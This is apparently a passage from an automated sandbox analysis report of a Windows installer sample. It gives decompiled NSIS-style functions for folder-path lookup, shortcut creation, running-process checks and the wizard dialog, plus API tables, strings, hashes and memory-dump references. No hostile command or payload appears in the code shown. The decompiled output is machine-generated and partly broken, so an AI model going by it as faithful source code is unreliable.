						_v12 =  &(_t88[1]);
						if(_a8 != 0xe002) {
							__eflags = _a8 - 0xe001;
							if(_a8 != 0xe001) {
								__eflags = _a8 - 0xe003;
								if(__eflags == 0) {
									__eflags = 0xe003;
									E00406831(_t84, _t104, _t113, _t104, 0xffffffffffffffff - _t113);
								}
								L44:
								_t55 = lstrlenW(_t104);
								_t88 = _v12;
								_t104 =  &(_t104[_t55]);
								_t47 = 0x46e220;
								goto L49;
							}
							__eflags = _t113 - 0x1d;
							if(_t113 != 0x1d) {
								__eflags = 0x47f000 + _t113 * 0x4008;
								E00406035(_t104, 0x47f000 + _t113 * 0x4008);
							} else {
								E00405F7D(_t104,  *0x47eab4);
							}
							__eflags = _t113 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L41:
								E00406064(_t104);
							}
							goto L44;
						}
						_t115 = 2;
						_t65 = GetVersion();
						if(_t65 >= 0 || _t65 == 0x5a04 || _v16 == 0x23 || _v16 == 0x2e) {
							_a8 = 1;
						} else {
							_a8 = _a8 & 0x00000000;
						}
						if( *0x47eb64 != 0) {
							_t115 = 4;
						}
						if(_t84 >= 0) {
							__eflags = _t84 - 0x25;
							if(_t84 != 0x25) {
								__eflags = _t84 - 0x24;
								if(_t84 == 0x24) {
									GetWindowsDirectoryW(_t104, 0x2004);
									_t115 = 0;
								}
								while(1) {
									__eflags = _t115;
									if(_t115 == 0) {
										goto L33;
									}
									_t66 =  *0x47eab0;
									_t115 = _t115 - 1;
									__eflags = _t66;
									if(_t66 == 0) {
										L29:
										_t68 = SHGetSpecialFolderLocation( *0x47eab4,  *(_t116 + _t115 * 4 - 0x18),  &_v8);
										__eflags = _t68;
										if(_t68 != 0) {
											L31:
											__eflags = 0;
											 *_t104 = 0;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t104);
										__imp__CoTaskMemFree(_v8);
										__eflags = _t68;
										if(_t68 != 0) {
											goto L33;
										}
										goto L31;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L29;
									}
									_t71 =  *_t66( *0x47eab4,  *(_t116 + _t115 * 4 - 0x18), 0, 0, _t104);
									__eflags = _t71;
									if(_t71 == 0) {
										goto L33;
									}
									goto L29;
								}
								goto L33;
							}
							GetSystemDirectoryW(_t104, 0x2004);
							goto L33;
						} else {
							_t86 = _t84 & 0x0000003f;
							E00405EFF(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x47ead8 + (_t84 & 0x0000003f) * 2, _t104, _t84 & 0x00000040);
							if( *_t104 != 0) {
								L34:
								if(_v16 == 0x1a) {
									lstrcatW(_t104, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L41;
							}
							E00406831(_t86, _t104, _t115, _t104, _v16);
							L33:
							if( *_t104 == 0) {
								goto L41;
							}
							goto L34;
						}
					}
					goto L51;
				}
			}

0x00406831
0x00406831
0x00406831
0x00406834
0x0040683c
0x0040684d
0x0040684d
0x00406855
0x00406858
0x0040685d
0x0040685e
0x00406863
0x00406874
0x00406877
0x00406877
0x0040687b
0x00406881
0x00406aad
0x00406aaf
0x00406ab6
0x00406ac2
0x00406ac2
0x00000000
0x00406887
0x00406887
0x00406888
0x00406889
0x0040689c
0x004068a4
0x004068a7
0x004068ac
0x00406a86
0x00406a89
0x00406a89
0x00406a99
0x00406a9c
0x00406a9c
0x00406a8b
0x00406a8e
0x00406a91
0x00406a94
0x00406a94
0x00406a9f
0x00406a9f
0x00406aa5
0x00000000
0x00000000
0x00000000
0x00406aa5
0x004068b5
0x00000000
0x00000000
0x004068bb
0x004068c2
0x004068c5
0x004068cb
0x004068d5
0x004068e6
0x004068ec
0x004068ef
0x004068f2
0x004068f9
0x00406a1e
0x00406a22
0x00406a60
0x00406a64
0x00406a69
0x00406a6d
0x00406a6d
0x00406a72
0x00406a73
0x00406a79
0x00406a7c
0x00406a7f
0x00000000
0x00406a7f
0x00406a24
0x00406a27
0x00406a3f
0x00406a46
0x00406a29
0x00406a30
0x00406a30
0x00406a4e
0x00406a51
0x00406a53
0x00406a54
0x00406a54
0x00000000
0x00406a51
0x00406901
0x00406902
0x0040690a
0x00406928
0x00406922
0x00406922
0x00406922
0x00406936
0x0040693a
0x0040693a
0x0040693d
0x00406979
0x0040697c
0x0040698c
0x0040698f
0x00406997
0x0040699d
0x0040699d
0x004069fb
0x004069fb
0x004069fd
0x00000000
0x00000000
0x004069a1
0x004069a8
0x004069a9
0x004069ab
0x004069c5
0x004069d3
0x004069d9
0x004069db
0x004069f6
0x004069f6
0x004069f8
0x00000000
0x004069f8
0x004069e1
0x004069ec
0x004069f2
0x004069f4
0x00000000
0x00000000
0x00000000
0x004069f4
0x004069ad
0x004069b0
0x00000000
0x00000000
0x004069bf
0x004069c1
0x004069c3
0x00000000
0x00000000
0x00000000
0x004069c3
0x00000000
0x004069fb
0x00406984
0x00000000
0x0040693f
0x0040694b
0x0040695c
0x00406965
0x00406a05
0x00406a09
0x00406a11
0x00406a11
0x00000000
0x00406a09
0x0040696f
0x004069ff
0x00406a03
0x00000000
0x00000000
0x00000000
0x00406a03
0x0040693d
0x00000000
0x00406aac

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424E27,7519EA30,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424E27,7519EA30,00000000), ref: 00406A73

Strings

F, xrefs: 00406A7F
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952
F, xrefs: 00406858

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004024FB, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133
comCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004024FB() {
				signed int _t52;
				void* _t55;
				intOrPtr* _t59;
				intOrPtr _t60;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				signed int _t69;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr* _t79;
				void* _t83;
				signed int _t94;
				intOrPtr* _t100;
				intOrPtr* _t101;
				void* _t102;
				void* _t107;
				void* _t113;

				 *((intOrPtr*)(_t113 - 0xc)) = E0040145C(_t102, 0xfffffff0);
				_t107 = E0040145C(_t102, 0xffffffdf);
				 *((intOrPtr*)(_t113 - 8)) = E0040145C(_t102, 2);
				 *((intOrPtr*)(_t113 - 0x10)) = E0040145C(_t102, 0xffffffcd);
				 *((intOrPtr*)(_t113 - 0x44)) = E0040145C(_t102, 0x45);
				if(E00405D51(_t107) == 0) {
					E0040145C(__edx, 0x21);
				}
				_t52 =  *(_t113 - 0x1c);
				E004062CF(L"CreateShortCut: out: \"%s\", in: \"%s %s\", icon: %s,%d, sw=%d, hk=%d",  *((intOrPtr*)(_t113 - 0xc)));
				_t55 = _t113 + 8;
				__imp__CoCreateInstance(0x40ac30, _t83, 1, 0x40ac10, _t55, _t107,  *((intOrPtr*)(_t113 - 8)),  *((intOrPtr*)(_t113 - 0x10)), _t52 & 0x000000ff, _t52 >> 0x00000008 & 0x000000ff, _t52 >> 0x10);
				if(_t55 < _t83) {
					L13:
					_push(0x4100f0);
					 *((intOrPtr*)(_t113 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t59 =  *((intOrPtr*)(_t113 + 8));
					_t60 =  *((intOrPtr*)( *_t59))(_t59, 0x40ac20, _t113 - 0x14);
					 *((intOrPtr*)(_t113 - 0x34)) = _t60;
					if(_t60 >= _t83) {
						_t63 =  *((intOrPtr*)(_t113 + 8));
						 *((intOrPtr*)(_t113 - 0x34)) =  *((intOrPtr*)( *_t63 + 0x50))(_t63, _t107);
						_t65 =  *((intOrPtr*)(_t113 + 8));
						 *((intOrPtr*)( *_t65 + 0x24))(_t65, 0x4d70b0);
						_t94 =  *(_t113 - 0x1c);
						_t69 = _t94 >> 0x00000008 & 0x000000ff;
						if(_t69 != 0) {
							_t101 =  *((intOrPtr*)(_t113 + 8));
							 *((intOrPtr*)( *_t101 + 0x3c))(_t101, _t69);
							_t94 =  *(_t113 - 0x1c);
						}
						_t70 =  *((intOrPtr*)(_t113 + 8));
						 *((intOrPtr*)( *_t70 + 0x34))(_t70, _t94 >> 0x10);
						_t72 =  *((intOrPtr*)(_t113 - 0x10));
						if( *_t72 != _t83) {
							_t100 =  *((intOrPtr*)(_t113 + 8));
							 *((intOrPtr*)( *_t100 + 0x44))(_t100, _t72,  *(_t113 - 0x1c) & 0x000000ff);
						}
						_t73 =  *((intOrPtr*)(_t113 + 8));
						 *((intOrPtr*)( *_t73 + 0x2c))(_t73,  *((intOrPtr*)(_t113 - 8)));
						_t75 =  *((intOrPtr*)(_t113 + 8));
						 *((intOrPtr*)( *_t75 + 0x1c))(_t75,  *((intOrPtr*)(_t113 - 0x44)));
						if( *((intOrPtr*)(_t113 - 0x34)) >= _t83) {
							_t79 =  *((intOrPtr*)(_t113 - 0x14));
							 *((intOrPtr*)(_t113 - 0x34)) =  *((intOrPtr*)( *_t79 + 0x18))(_t79,  *((intOrPtr*)(_t113 - 0xc)), 1);
						}
						_t77 =  *((intOrPtr*)(_t113 - 0x14));
						 *((intOrPtr*)( *_t77 + 8))(_t77);
					}
					_t61 =  *((intOrPtr*)(_t113 + 8));
					 *((intOrPtr*)( *_t61 + 8))(_t61);
					if( *((intOrPtr*)(_t113 - 0x34)) >= _t83) {
						_push(0x4100f0);
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00404F9E();
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t113 - 4));
				return 0;
			}

0x00402504
0x0040250e
0x00402517
0x00402521
0x0040252a
0x00402534
0x00402538
0x00402538
0x0040253d
0x00402565
0x0040256d
0x0040257e
0x00402586
0x00402646
0x00402646
0x0040264b
0x00402652
0x0040258c
0x0040258c
0x0040259b
0x0040259d
0x004025a2
0x004025a8
0x004025b2
0x004025b5
0x004025c0
0x004025c3
0x004025cb
0x004025cd
0x004025cf
0x004025d6
0x004025d9
0x004025d9
0x004025dc
0x004025e6
0x004025e9
0x004025ef
0x004025f4
0x004025fe
0x004025fe
0x00402601
0x0040260a
0x0040260d
0x00402616
0x0040261c
0x0040261e
0x0040262c
0x0040262c
0x0040262f
0x00402635
0x00402635
0x00402638
0x0040263e
0x00402644
0x00402659
0x0040265e
0x00000000
0x00000000
0x00000000
0x00402644
0x00401689
0x004030e6
0x004030f2

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004063D8, Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004063D8(signed int _a4) {
				void* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				struct HINSTANCE__* _v20;
				unsigned int _v24;
				_Unknown_base(*)()* _v28;
				char _v32;
				_Unknown_base(*)()* _v36;
				struct _OSVERSIONINFOW _v312;
				short _v832;
				intOrPtr _v1380;
				char _v1388;
				short _v1908;
				short _v2940;
				char _v2972;
				void* _t80;
				_Unknown_base(*)()* _t90;
				_Unknown_base(*)()* _t103;
				void* _t104;
				void* _t105;
				void* _t111;
				WCHAR* _t141;
				struct HINSTANCE__* _t142;
				unsigned int _t144;
				void* _t147;
				signed int _t152;
				intOrPtr* _t153;
				struct HINSTANCE__* _t154;
				void* _t155;
				signed int _t156;
				void* _t158;
				void* _t159;
				void* _t162;

				_t80 = GlobalAlloc(0x40, 0xfa0);
				_t141 = _a4;
				_v8 = _t80;
				_t152 = lstrlenW(_t141);
				_t3 = _t152 - 1; // -1
				if(_t3 > 0x103) {
					return 0x278;
				}
				_t156 = 0;
				if(_t152 <= 0) {
					L4:
					 *((short*)(_t162 + _t152 * 2 - 0x33c)) = 0;
					_v312.dwOSVersionInfoSize = 0x114;
					if(GetVersionExW( &_v312) != 0) {
						if(_v312.dwPlatformId == 2) {
							_t142 = LoadLibraryA("PSAPI.DLL");
							_v20 = _t142;
							if(_t142 != 0) {
								_t153 = GetProcAddress(_t142, "EnumProcesses");
								_v12 = GetProcAddress(_t142, "EnumProcessModules");
								_t90 = GetProcAddress(_t142, "GetModuleBaseNameW");
								_v16 = _t90;
								if(_t153 == 0 || _v12 == 0 || _t90 == 0) {
									_push(_t142);
									goto L35;
								} else {
									_push( &_v24);
									_push(0x3e8);
									_push(_v8);
									if( *_t153() != 0) {
										_a4 = _a4 & 0x00000000;
										_t144 = _v24 >> 2;
										if(_t144 == 0) {
											L24:
											GlobalFree(_v8);
											if(_v312.dwPlatformId != 1) {
												L44:
												FreeLibrary(_v20);
												return 0;
											}
											_t154 = LoadLibraryA("Kernel32.DLL");
											_v20 = _t154;
											if(_t154 == 0) {
												goto L10;
											}
											_a4 = GetProcAddress(_t154, "CreateToolhelp32Snapshot");
											_v12 = GetProcAddress(_t154, "Process32FirstW");
											_v16 = GetProcAddress(_t154, "Process32NextW");
											_v28 = GetProcAddress(_t154, "Module32FirstW");
											_t103 = GetProcAddress(_t154, "Module32NextW");
											_v36 = _t103;
											if(_v16 == 0 || _v12 == 0 || _t103 == 0 || _v28 == 0 || _a4 == 0) {
												L48:
												_push(_t154);
												L35:
												FreeLibrary();
												goto L10;
											} else {
												_t104 = _a4(2, 0);
												_v8 = _t104;
												if(_t104 == 0xffffffff) {
													goto L48;
												}
												_v1388 = 0x22c;
												_t105 = _v12(_t104,  &_v1388);
												while(_t105 != 0) {
													_t158 = _a4(8, _v1380);
													if(_t158 == 0xffffffff) {
														_t159 = 0x25d;
														L46:
														CloseHandle(_v8);
														FreeLibrary(_t154);
														L17:
														return _t159;
													}
													_v2972 = 0x428;
													_t111 = _v28(_t158,  &_v2972);
													while(_t111 != 0) {
														if(lstrcmpW( &_v2940,  &_v832) == 0) {
															CloseHandle(_t158);
															_t159 = 1;
															goto L46;
														}
														_v2972 = 0x428;
														_t111 = _v36(_t158,  &_v2972);
													}
													CloseHandle(_t158);
													_v1388 = 0x22c;
													_t105 = _v16(_v8,  &_v1388);
												}
												CloseHandle(_v8);
												goto L44;
											}
										} else {
											goto L19;
										}
										while(1) {
											L19:
											lstrcpyW( &_v1908, L"Unknown");
											_t155 = OpenProcess(0x410, 0,  *(_v8 + _a4 * 4));
											if(_t155 != 0) {
												_push( &_v24);
												_push(4);
												_push( &_v32);
												_push(_t155);
												if(_v12() != 0) {
													_v16(_t155, _v32,  &_v1908, 0x104);
												}
											}
											CloseHandle(_t155);
											if(lstrcmpW(CharUpperW( &_v1908),  &_v832) == 0) {
												break;
											}
											_a4 = _a4 + 1;
											if(_a4 < _t144) {
												continue;
											}
											goto L24;
										}
										_t142 = _v20;
										_t159 = 1;
										L16:
										FreeLibrary(_t142);
										GlobalFree(_v8);
										goto L17;
									}
									_t159 = 0x25d;
									goto L16;
								}
							}
							L10:
							return 0x25d;
						}
						if(_v312.dwPlatformId == 1) {
							goto L24;
						}
						return 0x25f;
					}
					return 0x25e;
				}
				_t147 = _t141 -  &_v832;
				do {
					 *((short*)(_t162 + _t156 * 2 - 0x33c)) = E00406057( *(_t162 + _t147 + _t156 * 2 - 0x33c) & 0x0000ffff);
					_t156 = _t156 + 1;
				} while (_t156 < _t152);
				goto L4;
			}

0x004063eb
0x004063f1
0x004063f5
0x004063fe
0x00406400
0x00406408
0x00000000
0x00406742
0x0040640e
0x00406412
0x0040643b
0x0040643d
0x0040644c
0x0040645e
0x00406477
0x0040649b
0x0040649d
0x004064a2
0x004064bc
0x004064c6
0x004064c9
0x004064cb
0x004064d0
0x0040667c
0x00000000
0x004064e8
0x004064eb
0x004064ec
0x004064f1
0x004064f8
0x00406519
0x0040651d
0x00406522
0x004065b1
0x004065b4
0x004065c1
0x00406709
0x0040670c
0x00000000
0x00406712
0x004065d2
0x004065d6
0x004065db
0x00000000
0x00000000
0x004065ef
0x004065fa
0x00406605
0x00406610
0x00406613
0x00406615
0x0040661b
0x0040673c
0x0040673c
0x0040667d
0x0040667d
0x00000000
0x00406644
0x00406647
0x0040664a
0x00406650
0x00000000
0x00000000
0x00406663
0x00406669
0x004066fc
0x00406693
0x00406698
0x00406716
0x0040671b
0x0040671e
0x00406725
0x0040650f
0x00000000
0x0040650f
0x004066a2
0x004066ac
0x004066de
0x004066c7
0x00406731
0x00406739
0x00000000
0x00406739
0x004066d1
0x004066db
0x004066db
0x004066e3
0x004066f3
0x004066f9
0x004066f9
0x00406703
0x00000000
0x00406703
0x00000000
0x00000000
0x00000000
0x00406528
0x00406528
0x00406534
0x00406550
0x00406554
0x00406559
0x0040655a
0x0040655f
0x00406560
0x00406566
0x00406578
0x00406578
0x00406566
0x0040657c
0x0040659f
0x00000000
0x00000000
0x004065a5
0x004065ab
0x00000000
0x00000000
0x00000000
0x004065ab
0x00406671
0x00406676
0x004064ff
0x00406500
0x00406509
0x00000000
0x00406509
0x004064fa
0x00000000
0x004064fa
0x004064d0
0x004064a4
0x00000000
0x004064a4
0x00406480
0x00000000
0x00000000
0x00000000
0x00406486
0x00000000
0x00406460
0x0040641a
0x0040641c
0x0040642d
0x00406435
0x00406437
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32 ref: 00406509

Strings

GetModuleBaseNameW, xrefs: 004064C0
Kernel32.DLL, xrefs: 004065C7
Module32FirstW, xrefs: 004065FF
PSAPI.DLL, xrefs: 00406490
EnumProcesses, xrefs: 004064AE
EnumProcessModules, xrefs: 004064B6
Process32NextW, xrefs: 004065F4
CreateToolhelp32Snapshot, xrefs: 004065E1
Unknown, xrefs: 00406528
Module32NextW, xrefs: 0040660A
Process32FirstW, xrefs: 004065E9

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004054A5, Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004054A5(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				void* _v20;
				struct HWND__* _v32;
				void* _v72;
				void* _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t69;
				struct HWND__* _t75;
				signed int _t88;
				struct HWND__* _t93;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					 *0x441d54 = _t37;
					__eflags = _t118 - 0x110;
					if(_t118 == 0x110) {
						 *0x47eab4 = _t128;
						 *0x441d74 = GetDlgItem(_t128, 1);
						_t93 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x441d64 = _t93;
						E00403D6B(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x476a70);
						 *0x476a74 = E0040141D(4);
						_t37 = 1;
						__eflags = 1;
						 *0x441d54 = 1;
					}
					_t125 =  *0x40c014; // 0xffffffff
					_t133 = (_t125 << 6) +  *0x47eac0;
					_t136 = 0;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E00403DDB(0x40b);
						while(1) {
							_t39 =  *0x441d54;
							 *0x40c014 =  *0x40c014 + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40c014; // 0xffffffff
							__eflags = _t41 -  *0x47eac4;
							if(_t41 ==  *0x47eac4) {
								E0040141D(1);
							}
							__eflags =  *0x476a74 - _t136;
							if( *0x476a74 != _t136) {
								break;
							}
							__eflags =  *0x40c014 -  *0x47eac4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E00406831(_t119, _t128, _t133, 0x4f70f0,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00403D6B(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00403D6B(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00403D6B(_t128);
							_t51 = GetDlgItem(_t128, 3);
							_v32 = _t51;
							__eflags =  *0x47eb6c - _t136;
							if( *0x47eb6c != _t136) {
								_t119 = _t119 & 0xfffffefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008);
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100);
							E00403DB1(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x441d64, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
							__eflags =  *0x47eb6c - _t136;
							if( *0x47eb6c == _t136) {
								_push( *0x441d74);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x441d64);
							}
							E00403DC4();
							_push(0x451d98);
							E00406035();
							E00406831(0x451d98, _t128, _t133,  &(0x451d98[lstrlenW(0x451d98)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x451d98);
							_push(_t136);
							_t69 = E0040139D( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t69;
							if(_t69 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x476a68);
									 *0x461db8 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t75 = CreateDialogParamW( *0x47eab8,  *_t133 +  *0x476a7c & 0x0000ffff, _t128,  *(0x40c018 +  *(_t133 + 4) * 4), _t133);
									 *0x476a68 = _t75;
									__eflags = _t75 - _t136;
									if(_t75 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00403D6B(_t75);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x476a68, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E0040139D( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x476a74 - _t136;
									if( *0x476a74 != _t136) {
										goto L61;
									}
									ShowWindow( *0x476a68, 8);
									E00403DDB(0x405);
									goto L58;
								}
								__eflags =  *0x47eb6c - _t136;
								if( *0x47eb6c != _t136) {
									goto L61;
								}
								__eflags =  *0x47eb60 - _t136;
								if( *0x47eb60 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x476a68);
						 *0x47eab4 = _t136;
						EndDialog(_t128,  *0x461dc0);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t88 = E0040139D( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t88;
						if(_t88 == 0) {
							goto L33;
						}
						SendMessageW( *0x476a68, 0x40f, 0, 1);
						__eflags =  *0x476a74;
						return 0 |  *0x476a74 == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x441d70, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x441d70,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E00403DF6(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x476a68, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x47eb6c - _t136;
										if( *0x47eb6c == _t136) {
											_t102 = E0040141D(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x461dc0 = 1;
											L21:
											_push(0x78);
											L22:
											E00403D44();
											goto L26;
										}
										E0040141D(_t130);
										 *0x461dc0 = _t130;
										goto L21;
									}
